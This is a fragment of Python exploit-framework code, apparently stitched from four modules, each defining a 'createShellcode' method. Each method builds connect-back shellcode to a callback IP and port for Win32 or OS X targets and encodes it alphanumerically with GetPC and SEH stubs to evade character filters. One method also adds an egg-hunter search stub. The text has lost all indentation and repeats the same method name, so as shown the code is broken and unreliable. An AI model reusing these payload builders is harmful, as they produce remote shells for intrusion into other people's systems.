def createShellcode(self):
if self.callback:
host = self.callback.ip
port = self.callback.port
self.shellcode = self.createHeapSafeInject(self.badstring, host, port)
encoder = alphanumeric.AlphaNum()
totopc = encoder.seh_pc()
getpc = encoder.get_pc(reg='ecx')
payload = encoder.encode(self.shellcode)
self.shellcode = totopc + getpc + payload
def createShellcode(self):
if self.callback:
host = self.callback.ip
port = self.callback.port
self.createWin32SearchShellcode(host, port)
encoder = alphanumeric.AlphaNum()
totopc = encoder.seh_pc()
getpc = encoder.get_pc(reg='ecx')
payload = encoder.encode(self.encodedsearchcode)
self.encodedsearchcode = totopc + getpc + payload
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
from shellcode.standalone.osx.payloads import payloads
from encoder import alphanumeric
self.log("OSX X86 Shellcode %d" % self.version)
p = payloads(self)
self.shellcode = p.assemble(p.callback(host, port, universal=True,
fork_exit=False))
encoder = alphanumeric.AlphaNum()
get_pc = encoder.get_pc(reg='eax')
self.shellcode = get_pc + encoder.encode(self.shellcode)
self.log("Shellcode size: %d" % len(self.shellcode))
self.log(prettyhexprint(self.shellcode))
def createShellcode(self):
if self.callback:
host = self.callback.ip
port = self.callback.port
encoder = alphanumeric.AlphaNum()
totopc = encoder.seh_pc()
getpc = encoder.get_pc(reg='ecx')
self.shellcode = self.createHeapSafeInject(self.badstring, host, port)
self.tag1 = "D2D2"
self.tag2 = "2D2D"
payload = encoder.encode(self.shellcode)
self.shellcode = totopc + getpc + payload
self.shellcode = self.tag2 + self.tag1 + self.shellcode
self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
self.encodedsearchcode = self.intel_encode(self.searchbadstring,
self.searchcode)
payload = encoder.encode(self.encodedsearchcode)
self.encodedsearchcode = totopc + getpc + payload
